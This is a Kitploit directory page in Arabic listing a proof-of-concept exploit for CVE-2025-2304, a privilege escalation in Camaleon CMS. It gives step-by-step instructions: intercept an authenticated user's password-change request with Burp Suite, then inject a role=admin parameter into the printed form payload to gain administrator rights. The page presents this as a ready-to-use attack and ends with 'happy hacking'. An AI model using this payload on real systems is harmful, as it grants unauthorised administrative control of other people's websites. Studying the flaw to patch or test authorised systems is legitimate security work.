Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2304_POC — CVE-2025-2304 POC - Camaleon CMS Privilege Escalation | Kitploit
أدوات/GitHubGitHub/azureadtrent/cve-2025-2304_poc
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubazureadtrent/cve-2025-2304_poc

CVE-2025-2304_POC

CVE-2025-2304 POC - Camaleon CMS Privilege Escalation

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-2304_POC

CVE-2025-2304 POC - تصعيد الصلاحيات في Camaleon CMS

يُستخدم هذا الـ POC لاستغلال صلاحيات Camaleon CMS للوصول إلى المسؤول. يعمل الثغرة عن طريق حقن الدور في وظيفة إعادة تعيين كلمة المرور لمستخدم مصادق.


المتطلبات الأساسية والافتراضات

  • لديك حساب مستخدم على نظام Camaleon CMS الهدف يمكنه الوصول إلى /admin.

1. الاعتراض

ابدأ بتسجيل الدخول إلى حساب المستخدم الخاص بك. بمجرد تسجيل الدخول، زر صفحة الملف الشخصي وانقر على تغيير كلمة المرور. قم باعتراض وظيفة تغيير كلمة المرور باستخدام Burp Suite.


2. تعديل الحمولة

باستخدام المثال أدناه، قم بتعديل حمولتك لإضافة الدور.

root@kitploit:~
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin

بإضافة %5Brole%5D=admin إلى حمولتك، يجب أن تصبح الآن مسؤولاً.


3. تحديث الصفحة

قم بتحديث الصفحة وستصبح الآن مسؤولاً.

اختراق سعيد!

الموارد

https://www.tenable.com/security/research/tra-2025-09

تنزيل الأداة